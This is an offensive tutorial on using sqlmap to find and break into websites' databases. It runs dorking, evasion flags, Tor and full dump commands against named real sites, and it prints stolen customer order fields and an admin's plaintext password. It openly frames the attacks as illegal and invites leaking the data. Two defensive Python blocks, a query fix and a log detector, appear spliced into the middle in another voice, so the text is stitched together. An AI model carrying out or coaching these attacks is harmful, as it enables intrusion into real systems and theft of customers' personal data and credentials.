
TUTORIAL: DATABASE HACKING

How To Hack Databases With SQLMap (advanced)

I already did a tutorial about sqlmap, but I think we should go deeper.

Can we use sqlmap in Termux?

- Yes, we can!

Installation in Termux:

$ wget https://github.com/sqlmapproject/sqlmap/archive/master.zip
$ pkg install unzip python2
$ unzip master.zip
$ cd sqlmap-master
$ python2 sqlmap.py

What do we need?
We need dorks. What are dorks?
Dorks are specific search keywords used to find specific files, targets or websites.
I found some nice dorks; you can use one of them. For example, I want shopping sites.

https://pastr.io/view/jpkjfyAIaKy

To get some vulnerable links, you can use sqlmap, or you can search manually in Google, Bing or
DuckDuckGo.

$ sqlmap -g 'intext:"Jewellery" inurl:/php?id='

-g takes a Google dork. (The whole dork is wrapped in single quotes so that the inner double quotes reach sqlmap intact.)


It will give you all the results; I decline each result until I find a page with a parameter like:

itemspage.aspx?val=2

To test it I answer "Y".


It may ask you whether to use the PHP cookie; I don't use it.

If you are using SQLi Dumper on Windows, you can copy all the dorks; the tool will search all
available search engines and save the URLs of the injectable parts.

My domain will be: http://www.melbournefineart.com.au/gallery.php?id=18

The basic syntax for sqlmap is sqlmap -u URL [OPTIONS]


I will explain some important options, and you can decide whether to use the basic or the advanced ones.

--method=METHOD
There are several HTTP methods for retrieving information from the target. I noticed that when I use GET it
gives me errors. I tried other methods as well; the available methods are listed below:
GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE

GET

The GET method is used to retrieve information from the given server using a given URI. Requests
using GET should only retrieve data and should have no other effect on the data.

HEAD

Same as GET, but transfers the status line and header section only.

POST

A POST request is used to send data to the server, for example, customer information, file upload,
etc. using HTML forms.

PUT

Replaces all current representations of the target resource with the uploaded content.

DELETE

Removes all current representations of the target resource given by a URI.

CONNECT

Establishes a tunnel to the server identified by a given URI.

OPTIONS

Describes the communication options for the target resource.

TRACE

Performs a message loop-back test along the path to the target resource.

Source: Tutorialspoint (not from rebl0x3r)


If you want to look for examples:

https://www.tutorialspoint.com/http/http_methods.htm

One of the first warnings is "[04:13:10] [WARNING] detected empty POST body".
Since this warning is printed, I know I can use the POST method.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST
[03:50:05] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
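An added example, not code from the tutorial or from sqlmap, showing the query pattern behind a "gallery.php?id=18" finding beside its parameterised fix. It runs against an in-memory SQLite database with constructed rows; the gallery and users tables, their columns and the values in them are assumptions made for the demonstration.

```python
# Added example, not code from the tutorial or from sqlmap: the query pattern
# behind a "gallery.php?id=18" finding, beside its parameterised fix.
# Everything here runs against an in-memory SQLite database with constructed
# rows; the 'gallery' and 'users' tables are assumptions for the demonstration.
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a public gallery table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gallery (id INTEGER, title TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO gallery VALUES (18, 'Landscape, oil on canvas');
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return conn

def gallery_vulnerable(conn, id_param: str):
    """The pattern sqlmap reports as injectable: the raw GET value is pasted into SQL."""
    sql = "SELECT id, title FROM gallery WHERE id = " + id_param
    return conn.execute(sql).fetchall()

def gallery_safe(conn, id_param: str):
    """Hardened form: reject anything that is not an integer, then bind the value."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute("SELECT id, title FROM gallery WHERE id = ?", (int(id_param),)).fetchall()

NORMAL_ID = "18"
# Shape of the 'Generic UNION query' technique sqlmap named in its output: the
# gallery query's two columns are matched by two columns from another table.
UNION_PROBE = "18 UNION ALL SELECT username, password FROM users"

def demo():
    """Run both handlers on a normal value and on the UNION value; return the four outcomes."""
    conn = make_db()
    vuln_normal = gallery_vulnerable(conn, NORMAL_ID)
    vuln_probe = gallery_vulnerable(conn, UNION_PROBE)   # second row is the users record
    safe_normal = gallery_safe(conn, NORMAL_ID)
    try:
        gallery_safe(conn, UNION_PROBE)
        safe_probe = "executed"
    except ValueError:
        safe_probe = "rejected"
    return vuln_normal, vuln_probe, safe_normal, safe_probe

if __name__ == "__main__":
    for label, result in zip(("vuln/normal", "vuln/union", "safe/normal", "safe/union"), demo()):
        print(f"{label}: {result}")
```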
--data=DATA

Data is, for example, "id=1". You can use it, but if you pass the link with php?id=345 then it's
unnecessary.

--mobile

This spoofs the User-Agent by choosing a smartphone from a list:

[1] Apple iPhone 8 (default)
[2] BlackBerry Z10
[3] Google Nexus 7
[4] Google Pixel
[5] HP iPAQ 6365
[6] HTC 10
[7] Huawei P8
[8] Microsoft Lumia 950
[9] Nokia N97
[10] Samsung Galaxy S7
[11] Xiaomi Mi 3

> 1

With this option we tell the website that we are using a phone.
Is this option useful? Yes, because some User-Agents are blocked. The User-Agent tells the
website:
- Device model (iPhone, Android ...)
- Browser (Chrome, Firefox ...)
- Browser version (Mozilla Gecko/20100101 Firefox/67.0)
- Operating system version (Android 8.0 ...)

A User-Agent looks like this:


Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:67.0) Gecko/20100101 Firefox/67.0

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --mobile

--random-agent
This selects a random User-Agent; it is an alternative to --mobile.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent

--ignore-401

It ignores the HTTP 401 (Unauthorized) error code; it's an optional switch. If it gives you
an error, use --ignore-code=401 instead.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401

--tor

Uses the Tor anonymity network, if you have no VPN. A disadvantage is that most websites detect
the blacklisted IPs of the Tor network. But it's good if you are doing an illegal attack.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor

--retries=RETRIES

Here you can set the number of retries when the connection times out. sqlmap recommends the value 3.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3

--force-ssl

Forces the use of SSL/HTTPS for a website. Some websites are HTTP only; you can try --force-ssl
if you are not getting a good result on http:// URLs.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl

--keep-alive

This uses persistent HTTP(S) connections, which helps avoid errors while testing; it's not
required.

--threads=THREADS

Maximum number of concurrent HTTP(S) requests. sqlmap's default is 1 thread; to speed things up you can use 10.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10

--level=LEVEL

Level of tests to perform; 1 is the default, the maximum is 5.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5

--risk=RISK

Risk of tests to perform; 1 is the default, the maximum is 3.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3

-f | --fingerprint
Perform an extensive database management system version fingerprint.
The following options can be used to enumerate the back-end database management system information,
structure and data contained in tables. Moreover, you can run your own SQL statements.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f

-a | --all

This retrieves everything. I recommend saving the output to a text file, because what it retrieves
differs from website to website:
- Databases
- Tables
- Columns

And this can be a lot, for example 20,000 users/emails, which will flood your terminal.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --all >> file.txt

--hostname

Retrieves the hostname of the database server and prints it.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname

--users
--passwords

These enumerate the DBMS users and passwords.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname --users --passwords

--dbs

This enumerates the databases. Use it before you enumerate the tables, which is
recommended. Use --dbs in place of --users and --passwords.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname --dbs

--tables

Enumerates tables; useful for fetching the columns later, e.g. from users.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname --tables

--columns

Enumerates table columns; we add -T for the table and --columns for the columns inside that
table.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname --columns

--dump

This option dumps the entries of a DBMS database table.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname -D finearts -T users --dump

-D = Database
-T = Tables
-C = Columns
-U = Users

--hex

Uses hex functions for data retrieval

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --method=POST --random-agent --ignore-401 --hex --tor --retries=3 --force-ssl --threads=10 --level=5 --risk=3 -f --hostname -D finearts -T users --dump

--wizard & --parse-errors

A simple wizard interface for beginners, and parsing of the DBMS error messages while running.

$ sqlmap -u http://www.melbournefineart.com.au/gallery.php?id=18 --wizard --parse-errors

HOW TO DUMP DATA FROM A DATABASE

Step 1). Finding a vulnerable website.

$ sqlmap -g cart.php?id=3

Or google for gaming/shopping dorks. You can also create your own dorks, which gives you a higher chance of
finding rare databases; I will make a tutorial about that in another PDF.

URL found?

Step 2). Testing the URL

$ sqlmap -u https://xxxxx.com/xxx.php?id=2

I got the error: 403 Forbidden

And:

[05:43:35] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

Re-run the tool with the suggested switches to fix the errors.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --tamper=space2comment

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

[05:46:31] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
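The defender's side of the same exchange, as an added example that is not part of the tutorial or of sqlmap: a small access-log triage that undoes space2comment-style tampering (/**/ in place of spaces) and flags UNION and NULL-column probes in the query string, so detection does not rely on the User-Agent that --random-agent rotates. The log lines, IP addresses and User-Agent strings are constructed samples, and the log format is assumed to be the common Apache/nginx "combined" format.

```python
# Added example, not code from the tutorial or from sqlmap: triage of web server
# access logs for the probing described above. Log lines, IPs and User-Agent
# strings are constructed samples; the "combined" log format is an assumption.
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Probe families matching what the tutorial's sqlmap output mentions.
SQLI_PATTERNS = {
    "UNION-based probe": r"\bUNION\b.*\bSELECT\b",
    "NULL column-count probe": r"\bNULL\s*,\s*NULL\b",
    "boolean tautology probe": r"\b(AND|OR)\b\s+\d+\s*=\s*\d+",
}

def normalize(query: str) -> str:
    """Strip inline comments (undoing space2comment), collapse whitespace, upper-case."""
    q = re.sub(r"/\*.*?\*/", " ", query)
    return re.sub(r"\s+", " ", q).strip().upper()

def classify(line: str):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, ua = m.group("path"), m.group("ua")
    raw_query = unquote_plus(path.partition("?")[2])
    reasons = []
    if ua.lower().startswith("sqlmap/"):   # default UA when --random-agent/--mobile are not used
        reasons.append("default sqlmap User-Agent")
    if "/*" in raw_query:
        reasons.append("inline comment in query string (space2comment-style tamper)")
    query = normalize(raw_query)
    for label, pattern in SQLI_PATTERNS.items():
        if re.search(pattern, query):
            reasons.append(label)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "reasons": reasons}

def scan(lines):
    """Findings for every line that matched at least one indicator."""
    return [f for f in map(classify, lines) if f and f["reasons"]]

SAMPLE_LOG = [  # constructed: one benign visitor and two sqlmap-style requests
    '198.51.100.2 - - [10/Jun/2019:05:43:35 +0000] "GET /xxx.php?id=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X)"',
    '203.0.113.7 - - [10/Jun/2019:05:44:01 +0000] "GET /xxx.php?id=2%20AND%201%3D1 HTTP/1.1" 200 4096 "-" "sqlmap/1.3.6#stable (http://sqlmap.org)"',
    '203.0.113.7 - - [10/Jun/2019:05:46:31 +0000] "GET /xxx.php?id=2/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,NULL-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], "->", "; ".join(hit["reasons"]))
```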

Step 3). Get the databases

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-code=403 --level=3 --risk=2 --dbs

If you have a PHP cookie, use it:

[05:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5mnk9btt6b9...savdfcjbe5'). Do you want to use those [Y/n] y
[05:49:19] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] loops001_loops

After finding the 2 databases, we check their tables by replacing --dbs with --tables.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-code=403 --level=3 --risk=2 --tables

[05:50:23] [INFO] fetching tables for databases: 'information_schema, loops001_loops'
Database: information_schema
[77 tables]
Database: loops001_loops
[10 tables]
+---------------------------------------+
| brands                                |
| categories                            |
| description                           |
| footwear                              |
| helmets                               |
| information                           |
| order_details                         |
| products                              |
| subscribers                           |
| users                                 |
+---------------------------------------+

A table listing looks like this. Next it will print the columns inside a table, so let's fetch them.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-code=403 --level=3 --risk=2 -D loops001_loops -T order_details --columns --dump

[05:54:52] [INFO] fetching columns for table 'order_details' in database 'loops001_loops'
Database: loops001_loops
Table: order_details
[8 columns]
+-----------------+----------------+
| Column          | Type           |
+-----------------+----------------+
| date            | date           |
| id              | int(11)        |
| name            | varchar(64)    |
| country         | varchar(64)    |
| email           | varchar(64)    |
| phone           | varchar(64)    |
| product_details | varchar(10000) |
| status          | varchar(11)    |
+-----------------+----------------+

[05:54:53] [INFO] fetching columns for table 'order_details' in database 'loops001_loops'
[05:54:53] [INFO] fetching entries for table 'order_details' in database 'loops001_loops'

After this command it floods my terminal; the CSV is saved under /root/.sqlmap/output/<websitename>/

[05:55:04] [INFO] table 'loops001_loops.order_details' dumped to CSV file '/root/.sqlmap/output/loopsuae.com/dump/loops001_loops/order_details.csv'
[05:55:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/loopsuae.com'

That's not enough; let's dump the users.

$ sqlmap -u https://xxxxx.com/xxx.php?id=2 --random-agent --ignore-code=403 --level=3 --risk=2 -D loops001_loops -T users --columns --dump

[05:57:42] [INFO] fetching columns for table 'users' in database 'loops001_loops'
Database: loops001_loops
Table: users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(128) |
| username | varchar(128) |
+----------+--------------+

[05:57:42] [INFO] fetching columns for table 'users' in database 'loops001_loops'
[05:57:42] [INFO] fetching entries for table 'users' in database 'loops001_loops'
Database: loops001_loops
Table: users
[1 entry]
+------+----------+------------+
| id   | username | password   |
+------+----------+------------+
| 1    | admin    | salam      |
+------+----------+------------+

Ok, I think the admin should change the password.


How to get access to the admin login?
The tool we use is "uniscan":

$ git clone https://github.com/poerschke/Uniscan.git
$ cd Uniscan
$ chmod +x install-modules.sh
$ apt install perl cpan
$ ./install-modules.sh
$ perl uniscan.pl -u [URL] -qweds

And you get your admin directory, like:
https://target.com/wp-admin/

Step 4). Open the CSV and enjoy your data. (Leaking is also possible.)

FIXING ERRORS:

[04:59:31] [CRITICAL] can't establish connection with the Tor SOCKS proxy. Please make sure that you have Tor service installed and setup so you could be able to successfully use switch '--tor'

Fix this error by installing Tor:

$ pkg install tor
$ apt install tor
$ service tor start

[05:01:58] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:

[CRITICAL] sqlmap was not able to fingerprint the back-end database management system

Remove the -f option.

[05:03:20] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 5 times, 500 (Internal Server Error) - 17 times, 403 (Forbidden) - 4 times

Remove --force-ssl.

[05:05:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

Use --no-cast.

[05:06:17] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)

Use --time-sec=20.

[05:06:20] [CRITICAL] unable to retrieve the number of database users

Remove --users.

[05:10:18] [ERROR] unable to retrieve the number of databases
[05:10:18] [INFO] falling back to current database
[05:10:18] [INFO] fetching current database
available databases [1]:
[*] finearts

Not an error as such: they fetched only 1 database. You can try your luck, but in most cases at this "ERROR" it's
a trash database.

[05:18:59] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases

Adding the options --parse-errors and --proxy will help; if not, try to fetch the banner using --banner.

[05:20:16] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y

Answer Y for yes, then 1 for the common list, and 10 for threads. Then just wait.

[05:07:02] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

Continue with C.

[05:35:32] [WARNING] unable to retrieve column names for table 'client' in database 'finearts'
do you want to use common column existence check? [y/N/q] y

Same as with --tables: just type Y to scan, and it will print all the columns.

WRITTEN BY MRBLACK AKA THEMASTERCH

TELEGRAM:


t.me/rebl0x3r
t.me/deepwaterleaks (currently down)
t.me/deepwaterleaks2
